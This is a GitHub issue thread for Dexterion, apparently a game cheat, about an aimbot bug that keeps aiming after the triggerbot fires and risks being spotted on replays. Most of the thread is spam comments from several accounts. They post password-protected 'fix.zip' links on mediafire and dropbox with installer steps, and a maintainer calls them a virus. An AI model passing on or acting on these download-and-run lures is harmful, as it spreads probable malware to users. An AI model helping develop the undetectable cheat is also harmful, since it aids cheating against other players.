### ISSUE TITLE
[Issue/Bug] AIMBot in memory while Triggerbot

### ISSUE THREAD

**Issue by LauraSavall** [Nocture-Insight/Dexterion#73]
### 🔍 Is there already an issue for your problem?

- [X] I have checked older issues, open and closed

### ℹ Environment / Computer Info

```Markdown
V.2.2.1
```

### 📝 Description

Hm, just saw a weird bug where AFTER the triggerbot delay, Dexterion keep AIMBot to work, so if you triggersomeone, you watch around right after...slowly approach to the enemy and zam your player will "force aim" to enemy... which is quite flagged on replay/spectator
Will dig into it

Video to show ; 

https://github.com/user-attachments/assets/bcaf5229-f076-4aea-8596-133c7f79705b

### ⚙️ Configuration Files

![image](https://github.com/user-attachments/assets/ba3b301b-62b4-4ece-82db-4cac603745d0)
With or without player lock..still same result

**Comment by wqq-z** [comment]
noticed about this, and your #72 merge has been aproved. [kernel-dexterion](https://github.com/Nocture-Insight/Dexterion/pull/72#issuecomment-2307819240) recoding will be made to avoid future bugs.

**Comment by LauraSavall** [comment]
will watch this kernel version <3

**Comment by LauraSavall** [comment]
Hum, I saw all Dexterion is "sleeping" between the mouse event, so the ESP is "freezing" too (as you can see on video)

**Comment by wqq-z** [comment]
ye we know.

**Comment by LauraSavall** [comment]
I understand...no solution about this ? Because, this is causing the aimbot bug I guess

**Comment by wqq-z** [comment]
ye we're going to make a code revmap

**Comment by wqq-z** [comment]
maybe its a render issue, or reading mem issue, also dont forget about multi-threads we can add this to remove a lots of delay i think ( didnt tested), also a saw a thread talking about delay on external they said that if we got fewer enetenities may cause lag 9 ddint tested in dexterion tho)

**Comment by wqq-z** [comment]
Btw most of this are performance issue

**Comment by LauraSavall** [comment]
not a only a render issue, it's look like Dexterion main is on sleep too during the 
`mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0);
Sleep(t/2);
mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
Sleep(t/2);`
So triggerbot is looking to keep aim on enemy, when finishing shooting, Dexterion is waiting for an enemy in FOV to aim into it...

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by wqq-z** [comment]
Do not distribut any thirdpatry links.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wqq-z** [comment]
bro stop sapmming a virus

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wqq-z** [comment]
bro ur link

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
